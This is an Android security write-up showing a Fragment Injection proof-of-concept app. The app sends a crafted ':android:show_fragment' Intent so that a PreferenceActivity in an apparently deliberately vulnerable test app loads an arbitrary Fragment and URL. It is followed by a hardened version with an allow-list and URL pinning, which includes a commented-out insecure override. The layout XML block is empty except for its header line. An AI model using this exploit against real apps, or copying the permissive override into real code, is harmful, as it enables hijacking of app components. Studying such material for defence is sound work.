The EXP below exploits the Fragment Injection vulnerability to attack TargetFragment, that is, to make the target app load an arbitrary Fragment. It works because the target activity derives from PreferenceActivity, which instantiates whatever class name arrives in the `:android:show_fragment` extra (PreferenceActivity.EXTRA_SHOW_FRAGMENT) unless the activity validates it:
- MainActivity.java code:

```java
package com.example.testpoc4;

import androidx.appcompat.app.AppCompatActivity;

import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.Toast;

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        // Look up the button by its id
        Button button1 = findViewById(R.id.button);
        // Fire the EXP on click
        button1.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Intent intent = new Intent();
                // CLEAR_TASK is only honoured together with FLAG_ACTIVITY_NEW_TASK; the injection does not depend on it
                intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
                // Target package name, then the fully qualified class name of the exported PreferenceActivity
                intent.setClassName("ddns.android.vuls", "ddns.android.vuls.activities.Activity.FragmentActivity");
                // PreferenceActivity.EXTRA_SHOW_FRAGMENT: the class the vulnerable activity will instantiate
                intent.putExtra(":android:show_fragment", "ddns.android.vuls.activities.Activity.TargetFragment");
                // URL that the injected TargetFragment loads into its WebView
                intent.setData(Uri.parse("https://orangey.blog.csdn.net"));
                startActivity(intent);
                // Shown once the Intent is sent; startActivity() itself does not report whether the Fragment loaded
                Toast.makeText(MainActivity.this, "Arbitrary Fragment load attack: loaded the Orangey CSDN blog", Toast.LENGTH_SHORT).show();
                Log.d("Arbitrary Fragment load attack:", "loaded the Orangey CSDN blog");
            }
        });
    }
}
```
- activity_main.xml code:

```xml
<?xml version="1.0" encoding="utf-8"?>
```
Through the Fragment Injection vulnerability, TargetFragment has loaded the attacker-supplied URL, as shown below:
![](http://imgq8.q578.com/ef/0925/ebbcb5335605bff2.jpg)
![](http://imgq8.q578.com/ef/0925/de6f2845bb73df8a.jpg)
Note: if the WebView inside the Fragment also exposes a Java object through webView.addJavascriptInterface(), malicious JavaScript served from the injected URL can call into that object, which amounts to a remote code execution vulnerability. That is not demonstrated here; see the earlier WebView article, where the attack technique is much the same and is not repeated.
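The defensive side of the same issue, as an added example that is neither the vulnerable app's code nor code from this post: a PreferenceActivity subclass shown in the injectable form the EXP above relies on and in the hardened form that allow-lists Fragment classes, plus a WebView-backed Fragment that pins the scheme and host of the URL it will load. The package name mirrors the EXP's target; the class names, the Fragment allow-list and the host list are assumptions made for illustration.

```java
// Added example (not the vulnerable app's own code). Package and class names,
// ALLOWED_FRAGMENTS and ALLOWED_HOSTS are assumptions for illustration.
package ddns.android.vuls.activities;

import android.app.Fragment;
import android.net.Uri;
import android.os.Bundle;
import android.preference.PreferenceActivity;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.webkit.WebView;
import java.util.Arrays;
import java.util.List;
import java.util.Locale;

public class FragmentActivity extends PreferenceActivity {

    // Fragment classes this activity is meant to host (assumed names).
    private static final List<String> ALLOWED_FRAGMENTS = Arrays.asList(
            "ddns.android.vuls.activities.FragmentActivity$SettingsFragment");

    /*
     * Injectable form. With targetSdkVersion < 19 PreferenceActivity never calls
     * isValidFragment(), so any class named in the ":android:show_fragment" extra is
     * instantiated; on 19+ an override like this one reproduces the same behaviour:
     *
     * @Override
     * protected boolean isValidFragment(String fragmentName) {
     *     return true;
     * }
     */

    // Hardened form: accept only an explicit allow-list. PreferenceActivity throws
    // IllegalArgumentException when this returns false, so a crafted Intent can no
    // longer reach an arbitrary Fragment such as TargetFragment.
    @Override
    protected boolean isValidFragment(String fragmentName) {
        return ALLOWED_FRAGMENTS.contains(fragmentName);
    }

    // A WebView-backed Fragment that reads its URL from the hosting Intent, the way the
    // EXP assumes TargetFragment does. Pinning scheme and host means that even a Fragment
    // that stays reachable will not render an attacker-supplied page.
    public static class SettingsFragment extends Fragment {
        private static final List<String> ALLOWED_HOSTS = Arrays.asList("help.example.com");

        static boolean isAllowedUrl(Uri uri) {
            return uri != null
                    && "https".equals(uri.getScheme())
                    && uri.getHost() != null
                    && ALLOWED_HOSTS.contains(uri.getHost().toLowerCase(Locale.ROOT));
        }

        @Override
        public View onCreateView(LayoutInflater inflater, ViewGroup container,
                                 Bundle savedInstanceState) {
            WebView webView = new WebView(getActivity());
            // JavaScript stays disabled and no addJavascriptInterface() bridge is registered,
            // so there is nothing for injected script to call into.
            Uri target = getActivity().getIntent().getData();
            webView.loadUrl(isAllowedUrl(target) ? target.toString() : "about:blank");
            return webView;
        }
    }
}
```

Two further checks belong with this fix: declare the activity with `android:exported="false"` in AndroidManifest.xml unless other apps genuinely need to start it, and keep `targetSdkVersion` at 19 or above so that the platform enforces `isValidFragment()` at all.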